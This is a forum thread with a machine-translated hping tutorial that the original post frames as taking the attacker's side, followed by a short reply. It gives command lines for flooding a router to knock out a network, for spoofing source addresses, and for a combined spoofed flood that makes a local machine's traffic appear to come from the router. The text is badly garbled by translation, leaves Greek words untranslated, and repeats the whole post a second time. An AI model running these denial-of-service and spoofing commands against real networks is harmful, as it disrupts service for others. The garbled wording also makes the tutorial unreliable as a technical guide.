[linux] Hping tutorial

CrashOverline · 02-19-2010, 05:22 PM

There are many tools for testing if a network does not mince attacks such as DoS, sniffing, spoofing clips, and a significant help admin to make the network more secure as it can. At the same time these tools can be a nightmare for an admin who has not taken the steps paraitita. That in a nutshell can be used for good purposes can, however chrisimopoithoun and bad. It depends on what side we are and what we want. In this article we will take the hand of the aggressor and chrisi9mopoiisoume a very powerful tool hping. For those who do not know what makes this tool I refer you here:

Code:

 http://en.wikipedia.org/wiki/Hping

First you should download (if you have naturally) in hping from here:

Code:

http://www.hping.org/download.php

After you install on your system, you will go to either terminal (linux / unix), or the Command prompt (cmd) for Windows.
The tutorial will be linux fedora course there is no difference between systimatos in this tool.
To see what parameters dechete about this tool is sufficient to typed hping - help, and will take us
all parameters and what each one. Certainly not here to analyze all but you can peiramatistite.

The following are some (not-so-innocent) uses of this tool.

DoS:
The fear and terror of an admin is not to drop your network that do not accept a DoS attack even from within the network. With this tool we kalista causing a DoS kapoioa network device making it impossible to serve the network. Suppose we want to attack a router network
be typed the following command.

Code:

 hping - flood 192.168.2.1

The format is very simple. Just tell hping to send packets to the router constantly in my case 192.168.2.1
CAUTION: If you are connected to the internet connection will be dropped but do not worry it epanelei.

We can add other parameters depending on what we do.
Eg We can change how many hops the TTL to be done to reach its destination ([Doar userii inregistrati pot vedea linkurile. ]), exactly how many packages will send clips.

Code:

 hping - flood - ttl 2 - count 100 192.168.2.1

In the above command just hping commands to send 100 packages to flood mode with ttl 2 to router 192.168.2.1

Of course, of course there are other parameters that you can find them if you typed hping - help

Simple ip spoofing
On to hping can execute and ip spoofing attacks. You will perform a simple ip spoofing attack. (There is a blind ip spoofing but wants a lot of time and patience)
Dialdi to send a package from us ip (192.168.2.29), the router (192.168.2.1) having to change source ip from 192.168.2.29 to any one we like 192.168.2.100

To execute ip spoofing attacks again the syntax is quite easy:

Code:

  hping - spoof [fake source address] [destination address]

That is, if we want to make the example given above is sufficient to "give" the following command:

Code:

hping - spoof 192.168.2.100 192.168.2.1

And the results in WireShark.

As we have seen a single ip spoofing ....

Ip spoofing & DoS mixed:
Now we will attack ip spoofing & DoS taftochtona. That will make DoS another pc on the network with spoofed ip address (we will put ip address as the address of the router), so the pc will do flood to think that the requests come from the router so that steleni responses resulting have the same effect as described on poti case.

Anlaftikotera ..

Code:

hping - flood - spoof 192.168.2.1 - ttl 2 192.168.2.34

Let me explain ....
We normally flood as in the first case with a false ip (router ip), in order the pc to think that the requests come from the router and the answering plimyrizontas with packages making it impossible to service the network ...

Sending custom packets:
hping boryme the course and send our packages. What I mean. Do we capture a packet file from wireshark for example, and then to give the course and hping to send it as a spoofed address. What detail:

Code:

 hping - spoof 192.168.2.100-d 100-E testfile 192.168.2.1

Let me explain ..
The unknown parameter - spoof set the fake address. The-d is the packet size. How is the packet size,-R is the record of the captured packets in, and 192.168.2.1 is the goal.
The package I have done to capture WireShark and a simple packet icmp echo request (The packet is sent when a computer makes ping).

And here is the result of this mandate in WireShark ....

And of course you can dyndyazetai parameters as well and others have failed, moreover, for this is both possible tool.

=======================================

Tin sa precizez ca tutorialul a fost tradus cu google trans. din limba greaca in cea engleza.
Sper sa intelegeti...

Il traduceam direct in romana dar se intelege mai bine in engleza

pyth0n3 · 02-19-2010, 07:14 PM

Hping3 suporta optiunea --flood iar syntax-ul e

Code:

hping3  --flood 192.168.0.1

Va trimite pachete in mod continuu si repede

Spoofing in Hping3

Code:

hping3    --spoof 192.168.0.2 --icmp-ts 192.168.0.1

Pot fi specificate si anumite pachete , in acest caz am specificat un ICMP timestamp request

Dar pot fi si altele

Code:

ICMP
  -C  --icmptype   icmp type (default echo request)
  -K  --icmpcode   icmp code (default 0)
      --force-icmp send all icmp types (default send only supported types)
      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)
      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)
      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)
      --icmp-help  display help for others icmp options
UDP/TCP
  -s  --baseport   base source port             (default random)
  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc/dec
  -k  --keep       keep still source port
  -w  --win        winsize (default 64)
  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen / 4)
  -Q  --seqnum     shows only tcp sequence number
  -b  --badcksum   (try to) send packets with a bad IP checksum
                   many systems will fix the IP checksum sending the packet
                   so you'll get bad UDP/TCP checksum instead.
  -M  --setseq     set TCP sequence number
  -L  --setack     set TCP ack
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag
  -U  --urg        set URG flag
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-timestamp  enable the TCP timestamp option to guess the HZ/uptime

Este un tool destul de tare pt a efectua diverse lucruri ,dar va trebui folosit si un sniffer ca sa analizati pachetele trimise si raspunsurile primite
Este un scanner folosit pt servere care folosesc Firewall,sau IDS pt a analiza comportamentul a acestora .

02-19-2010, 05:22 PM	#1 (permalink)
CrashOverline Registered user Bautor de palinca Join Date: Dec 2009 Location: AREA 69 Posts: 136 Rep Power: 1	[linux] Hping tutorial hotel regim hotelier hotel yahoo domain There are many tools for testing if a network does not mince attacks such as DoS, sniffing, spoofing clips, and a significant help admin to make the network more secure as it can. At the same time these tools can be a nightmare for an admin who has not taken the steps paraitita. That in a nutshell can be used for good purposes can, however chrisimopoithoun and bad. It depends on what side we are and what we want. In this article we will take the hand of the aggressor and chrisi9mopoiisoume a very powerful tool hping. For those who do not know what makes this tool I refer you here: Code: http://en.wikipedia.org/wiki/Hping First you should download (if you have naturally) in hping from here: Code: http://www.hping.org/download.php After you install on your system, you will go to either terminal (linux / unix), or the Command prompt (cmd) for Windows. The tutorial will be linux fedora course there is no difference between systimatos in this tool. To see what parameters dechete about this tool is sufficient to typed hping - help, and will take us all parameters and what each one. Certainly not here to analyze all but you can peiramatistite. The following are some (not-so-innocent) uses of this tool. DoS: The fear and terror of an admin is not to drop your network that do not accept a DoS attack even from within the network. With this tool we kalista causing a DoS kapoioa network device making it impossible to serve the network. Suppose we want to attack a router network be typed the following command. Code: hping - flood 192.168.2.1 The format is very simple. Just tell hping to send packets to the router constantly in my case 192.168.2.1 CAUTION: If you are connected to the internet connection will be dropped but do not worry it epanelei. We can add other parameters depending on what we do. Eg We can change how many hops the TTL to be done to reach its destination ([Doar userii inregistrati pot vedea linkurile. ]), exactly how many packages will send clips. Code: hping - flood - ttl 2 - count 100 192.168.2.1 In the above command just hping commands to send 100 packages to flood mode with ttl 2 to router 192.168.2.1 Of course, of course there are other parameters that you can find them if you typed hping - help Simple ip spoofing On to hping can execute and ip spoofing attacks. You will perform a simple ip spoofing attack. (There is a blind ip spoofing but wants a lot of time and patience) Dialdi to send a package from us ip (192.168.2.29), the router (192.168.2.1) having to change source ip from 192.168.2.29 to any one we like 192.168.2.100 To execute ip spoofing attacks again the syntax is quite easy: Code: hping - spoof [fake source address] [destination address] That is, if we want to make the example given above is sufficient to "give" the following command: Code: hping - spoof 192.168.2.100 192.168.2.1 And the results in WireShark. As we have seen a single ip spoofing .... Ip spoofing & DoS mixed: Now we will attack ip spoofing & DoS taftochtona. That will make DoS another pc on the network with spoofed ip address (we will put ip address as the address of the router), so the pc will do flood to think that the requests come from the router so that steleni responses resulting have the same effect as described on poti case. Anlaftikotera .. Code: hping - flood - spoof 192.168.2.1 - ttl 2 192.168.2.34 Let me explain .... We normally flood as in the first case with a false ip (router ip), in order the pc to think that the requests come from the router and the answering plimyrizontas with packages making it impossible to service the network ... Sending custom packets: hping boryme the course and send our packages. What I mean. Do we capture a packet file from wireshark for example, and then to give the course and hping to send it as a spoofed address. What detail: Code: hping - spoof 192.168.2.100-d 100-E testfile 192.168.2.1 Let me explain .. The unknown parameter - spoof set the fake address. The-d is the packet size. How is the packet size,-R is the record of the captured packets in, and 192.168.2.1 is the goal. The package I have done to capture WireShark and a simple packet icmp echo request (The packet is sent when a computer makes ping). And here is the result of this mandate in WireShark .... And of course you can dyndyazetai parameters as well and others have failed, moreover, for this is both possible tool. ======================================= Tin sa precizez ca tutorialul a fost tradus cu google trans. din limba greaca in cea engleza. Sper sa intelegeti... Il traduceam direct in romana dar se intelege mai bine in engleza __________________ Bau!